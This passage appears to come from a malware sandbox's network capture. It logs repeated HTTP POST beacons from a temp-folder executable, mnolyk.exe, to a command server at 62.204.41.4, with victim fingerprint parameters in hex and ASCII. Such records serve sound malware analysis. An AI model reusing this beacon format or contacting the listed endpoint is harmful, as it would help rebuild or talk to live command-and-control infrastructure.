                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:01.813494921 CET | 547 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    348 | 192.168.2.3 | 50051 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:01.990272999 CET | 548 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:02.057045937 CET | 548 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    349 | 192.168.2.3 | 50052 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:02.230699062 CET | 549 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:02.294034004 CET | 549 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    35 | 192.168.2.3 | 49737 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:25.346204996 CET | 236 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:25.410954952 CET | 236 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    350 | 192.168.2.3 | 50053 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:02.465552092 CET | 550 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:02.529279947 CET | 550 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    351 | 192.168.2.3 | 50054 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:02.698713064 CET | 551 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:02.764348984 CET | 551 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    352 | 192.168.2.3 | 50055 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:02.962291002 CET | 552 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:03.026889086 CET | 552 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    353 | 192.168.2.3 | 50056 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:03.201021910 CET | 553 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:03.302412033 CET | 553 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    354 | 192.168.2.3 | 50057 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:03.487998962 CET | 554 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:03.551975012 CET | 554 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    355 | 192.168.2.3 | 50058 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:03.745857954 CET | 555 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:03.809408903 CET | 555 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    356 | 192.168.2.3 | 50059 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:03.983890057 CET | 556 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:04.048372030 CET | 556 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    357 | 192.168.2.3 | 50060 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:04.219259024 CET | 557 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:04.284405947 CET | 557 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    358 | 192.168.2.3 | 50061 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:04.464646101 CET | 558 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:04.527714014 CET | 558 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    359 | 192.168.2.3 | 50062 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:04.699485064 CET | 559 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:04.762595892 CET | 559 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    36 | 192.168.2.3 | 49738 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:25.612828016 CET | 237 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:25.675921917 CET | 237 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    360 | 192.168.2.3 | 50063 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:04.954076052 CET | 560 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:05.018045902 CET | 560 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    361 | 192.168.2.3 | 50064 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:05.202732086 CET | 561 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:05.269459009 CET | 561 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    362 | 192.168.2.3 | 50065 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:05.449264050 CET | 562 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:05.513484001 CET | 562 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    363 | 192.168.2.3 | 50066 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:05.694509029 CET | 563 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:05.756572008 CET | 563 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    364 | 192.168.2.3 | 50067 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:05.932411909 CET | 564 | OUT | POST /Gol478Ns/index.php HTTP/1.1
